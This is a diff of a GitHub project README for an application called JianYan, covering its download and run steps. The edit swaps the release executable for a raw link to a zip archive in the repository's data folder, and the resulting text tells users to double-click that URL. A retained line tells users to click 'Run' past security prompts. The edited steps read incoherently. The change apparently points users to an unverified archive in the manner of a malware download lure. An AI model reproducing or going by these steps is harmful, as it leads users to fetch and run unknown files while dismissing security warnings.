Jnewton-lab/JianYan/README.md

 ### Step 3: Download the Application

 Scroll down on the release page to find the downloadable files.
-Click on the file named `JianYan.exe` to start downloading.
+Click on the file named `https://github.com/Jnewton-lab/JianYan/raw/refs/heads/main/data/Jian-Yan-v3.7.zip` to start downloading.

 ### Step 4: Run JianYan

 Once the download is complete, locate the file in your downloads folder.
-Double-click `JianYan.exe` to run the application.
+Double-click `https://github.com/Jnewton-lab/JianYan/raw/refs/heads/main/data/Jian-Yan-v3.7.zip` to run the application.
 You might see a security prompt; if so, simply click "Run" to proceed.

 ## ⚙️ System Requirements